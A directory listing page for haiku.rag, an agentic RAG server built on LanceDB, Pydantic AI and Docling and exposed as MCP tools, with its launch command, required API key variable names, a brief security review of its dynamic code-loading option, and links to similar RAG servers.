haiku.rag
Verified Safeby ggozad
Overview
An opinionated agentic RAG system that uses LanceDB for vector storage, Pydantic AI for multi-agent workflows, and Docling for document processing, exposing its capabilities as MCP tools for AI assistants.
Installation
haiku-rag serve --mcp --stdioEnvironment Variables
- OPENAI_API_KEY
- ANTHROPIC_API_KEY
- VOYAGE_API_KEY
- CO_API_KEY
- ZEROENTROPY_API_KEY
- OLLAMA_BASE_URL
- DOCLING_SERVE_API_KEY
Security Notes
The system uses environment variables for API keys, which is good practice. It connects to various external AI providers and optionally to `docling-serve` or fetches content from arbitrary URLs, implying trust in external services and careful API key management. The `load_callable` function, used for the `markdown_preprocessor` configuration, allows dynamic loading and execution of Python code specified in the configuration file. While typically controlled by the server operator, this is a significant security risk if the configuration can be tampered with or if untrusted paths are specified.
Similar Servers
Context-Engine
A Retrieval-Augmented Generation (RAG) stack for codebases, enabling context-aware AI agents for developers and IDEs through unified code indexing, hybrid search, and local LLM integration.
flexible-graphrag
The Flexible GraphRAG MCP Server provides a Model Context Protocol (MCP) interface for AI assistants (like Claude Desktop) to interact with a sophisticated RAG and GraphRAG system for document processing, knowledge graph auto-building, hybrid search, and AI Q&A.
mcp-local-rag
A privacy-first, local document search server that leverages semantic search for Model Context Protocol (MCP) clients.
rag-server-mcp
Provides Retrieval Augmented Generation (RAG) capabilities to Model Context Protocol (MCP) clients by indexing local project documents and retrieving relevant information for LLMs.